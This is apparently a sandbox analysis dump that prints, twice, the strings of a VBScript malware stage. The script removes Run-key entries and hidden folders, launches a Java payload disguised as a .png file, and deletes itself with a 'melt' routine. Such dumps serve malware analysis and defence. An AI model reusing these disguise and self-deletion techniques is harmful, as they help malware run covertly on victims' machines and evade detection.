Note: Laura is the user name on the sandbox
File: OiuFr7LcfXq1847924646026958055.vbs
MD5: 9e1ede0dedadb7af34c0222ada2d58c9
Size: 1542
Ascii Strings:
---------------------------------------------------------------------------
on error resume next
Wscript.sleep 5000
Dim oShell
Dim sFunction
Set oShell = WScript.CreateObject ("WSCript.shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
oShell.regdelete("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\GKXeW0Yke7")
oShell.regdelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\GKXeW0Yke7")
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd""",0
objFSO.DeleteFile("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd"),TRUE
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f""",0
Wscript.sleep 5000
objFSO.DeleteFile("C:\Documents and Settings\Laura\.m4w6OAI02f\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\.m4w6OAI02f"),TRUE
oShell.run """C:\Program Files\Java\jre7\bin\javaw.exe"" -jar ""C:\DOCUME~1\Laura\LOCALS~1\Temp\iWimMQLgpsT2624529381479181764.png"""
Wscript.sleep 3000
objFSO.DeleteFile("C:\DOCUME~1\Laura\LOCALS~1\Temp\iWimMQLgpsT2624529381479181764.png\*"),TRUE
Set oShell = Nothing
Set objFSO = Nothing
sFunction = "WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & WScript.ScriptFullName & Chr(34)
Execute(sFunction)
Unicode Strings:
---------------------------------------------------------------------------
File: OiuFr7LcfXq1847924646026958055.vbs
MD5: 9e1ede0dedadb7af34c0222ada2d58c9
Size: 1542
Ascii Strings:
---------------------------------------------------------------------------
on error resume next
Wscript.sleep 5000
Dim oShell
Dim sFunction
Set oShell = WScript.CreateObject ("WSCript.shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
oShell.regdelete("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\GKXeW0Yke7")
oShell.regdelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\GKXeW0Yke7")
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\Application Data\9bor9J6cRd""",0
objFSO.DeleteFile("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\Application Data\9bor9J6cRd"),TRUE
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f\*.*""",0
oShell.run "attrib -s -h -r ""C:\Documents and Settings\Laura\.m4w6OAI02f""",0
Wscript.sleep 5000
objFSO.DeleteFile("C:\Documents and Settings\Laura\.m4w6OAI02f\*"),TRUE
objFSO.DeleteFolder("C:\Documents and Settings\Laura\.m4w6OAI02f"),TRUE
oShell.run """C:\Program Files\Java\jre7\bin\javaw.exe"" -jar ""C:\DOCUME~1\Laura\LOCALS~1\Temp\iWimMQLgpsT2624529381479181764.png"""
Wscript.sleep 3000
objFSO.DeleteFile("C:\DOCUME~1\Laura\LOCALS~1\Temp\iWimMQLgpsT2624529381479181764.png\*"),TRUE
Set oShell = Nothing
Set objFSO = Nothing
sFunction = "WScript.Sleep 3000: Set Melt = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & "): Melt.DeleteFile " & Chr(34) & WScript.ScriptFullName & Chr(34)
Execute(sFunction)
Unicode Strings:
---------------------------------------------------------------------------